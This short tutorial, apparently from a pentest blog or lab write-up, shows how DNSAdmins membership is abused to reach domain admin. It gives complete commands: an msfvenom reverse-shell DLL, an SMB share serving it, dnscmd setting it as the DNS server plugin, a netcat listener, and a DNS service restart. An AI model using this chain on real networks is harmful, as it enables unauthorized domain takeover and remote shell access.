Windows Privilege Escalation DNSAdmin to Domain Admin DLL Injection

This post will cover a very specific privilege escalation technique: Abusing DNSAdmin membership to gain domain admin.

Prepping

First, we must determine whether our user belongs to the DNSAdmins group.

We can see that our user is a member of the DNSAdmins group. (MEGABANK\DnsAdmins)

Creating & serving the malicious DLL

We need to create a malicious DLL file that will be supplied as the ServerLevelPluginDll value. Here, I used the msfvenom tool to generate the DLL file.

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.X LPORT=4444 --platform=windows -f dll > ~/Desktop/plugin.dll

Now we have the malicious DLL file. Let's use Impacket's smbserver.py to serve this DLL file to our victim machine.

    sudo python smbserver.py -debug SHARE /home/kali/share

Injecting the DLL

Now we will use dnscmd.exe to set our newly created DLL as the DNS server's ServerLevelPluginDll. Dnscmd is a command-line interface for managing a DNS server; it can be used to automate routine DNS management or to perform simple unattended setup and configuration of new DNS servers on a network.

Run the below command to inject the DLL file:

    C:\>dnscmd.exe BANK.local /config /serverlevelplugindll \\10.10.10.X\SHARE\plugin.dll

Before you continue, make sure you have started your listener on the attack machine so that you are able to catch the reverse shell.

    $ nc -nvlp 4444

Once the Netcat listener is running, we can restart the DNS service to execute our malicious DLL.

    sc.exe stop dns
    sc.exe start dns

After that, go back and check your Netcat listener: you should have a reverse shell. 😎
